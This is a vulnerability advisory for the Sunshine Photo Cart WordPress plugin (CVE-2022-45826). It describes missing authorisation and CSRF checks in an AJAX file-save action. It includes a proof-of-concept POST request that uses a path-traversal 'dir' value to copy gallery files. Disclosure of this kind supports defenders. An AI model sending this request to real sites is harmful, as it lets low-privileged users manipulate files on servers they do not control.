Sunshine Photo Cart by WP Sunshine

Sunshine Photo Cart by WP Sunshine <= 2.9.13 - Broken Access Control

LANACOMMONVDB ID: 2481a5b2-bf35-4232-8597-6166b9ee5a92

The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, which could allow any authenticated users, such as subscriber to copy the gallery files to another folder.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=sunshine_file_save&gallery_id=1&dir=..%2Ftest&item_number=100

This function copies the jpg files from /uploads/test to /uploads/sunshine/1 folder.

References

Source Code: https://wordpress.org/plugins/sunshine-photo-cart/

CVE: CVE-2022-45826

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-09

Published: 2022-12-01

Affected Version: <= 2.9.13

Classification

Type: Broken Access Control, Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]